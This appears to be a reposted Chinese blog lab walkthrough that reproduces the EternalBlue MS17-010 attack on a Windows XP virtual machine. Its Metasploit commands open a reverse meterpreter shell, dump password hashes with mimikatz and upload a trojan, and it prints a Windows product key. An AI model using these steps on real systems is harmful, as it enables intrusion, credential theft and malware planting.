博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
【漏洞复现】永恒之蓝 ms17-010 漏洞利用 攻击手法
阅读量:4573 次
发布时间:2019-06-08

本文共 1139 字,大约阅读时间需要 3 分钟。


日期:2018-07-21 21:09:16

介绍:永恒之蓝利用的 ms17-010 漏洞,拿 Shell、查看文件、获取密码。


0x01、实验环境

攻击机

系统:macOS Sierra 10.12.5IP:10.211.55.2

靶机

系统:Windows XP SP3 英文版(虚拟机)IP:10.211.55.19激活码:HTXH6-2JJC4-CDB6C-X38B4-C3GF3

0x02、使用 msf 攻击 XP

mac 中使用 metasploitkali 中使用 metasploit 去做攻击,流程是一样的,按照以下步骤进行即可。

首先在命令行输入 msfconsole 进入 metasploit

进入后,使用 search 命令,查找与 ms17-010 相关的模块。

依次进行以下操作。

# 选择 msf 相关的模块use exploit/windows/smb/ms17_010_psexec# 查看需要设置的信息show options# 设置靶机的 IP 和端口set rhosts 10.211.55.19set rport 445# 设置攻击使用的 payloadset payload windows/meterpreter/reverse_tcpset lhost 10.211.55.2set lport 4444# 进行攻击exploit

成功弹回 shell。

0x03、其他操作

查看靶机文件

查看靶机文件,可直接在 shell 中执行 cmd 命令。

也可以直接在 meterpreter 中操作。

提取 Windows 密码

提取 Windows 密码的 hash:

密码哈希有三种方式:LM、NTLM、NTLMv2,LM 存储的时候,7个字符一组(如果密码长度是14位,就会分成两组),NTLM 是整体转换。使用工具 mimikatz,获取到 ntlm 的值,然后去 http://www.objectif-securite.ch/en/ophcrack.php 解密即可。

相关命令:

getsystemload mimikatzmsv

电脑锁屏

shellecho rundll32.exe user32.dll LockWorkStation  > 1.bat1.bat

植入木马

upload /tmp/muma.exe c:\\

0x04、其他

利用 meterpreter 还可以进行监听键盘、获取图形化界面等操作,

此处不一一演示,有兴趣可上网查询相关资料。

转载于:https://www.cnblogs.com/v1vvwv/p/ms17-010-exploit.html

你可能感兴趣的文章
【安卓基础】倒计时按钮封装(验证码倒计时按钮)
查看>>
configparser模块
查看>>
SelectQueryBuilder的用法
查看>>
android的用户定位(一)
查看>>
creat-react-app搭建的项目中按需引入antd以及配置Less和如何修改antd的主题色
查看>>
IIS安装
查看>>
html块级元素和行级元素的区别和使用
查看>>
for循环嵌套
查看>>
寒冬夜行人
查看>>
poj1151 Atlantis
查看>>
HTML页面之间的参数传递
查看>>
java面试题集锦
查看>>
scikit-learn:4.2.3. Text feature extraction
查看>>
Spring Security构建Rest服务-0800-Spring Security图片验证码
查看>>
AE待整理
查看>>
java8中规范的四大函数式接口
查看>>
分类---Logistic Regression
查看>>
35.Docker安装Mysql挂载Host Volume
查看>>
Ubuntu 英文下Fcitx 无法输入中文
查看>>
Android压力测试命令monkey详解
查看>>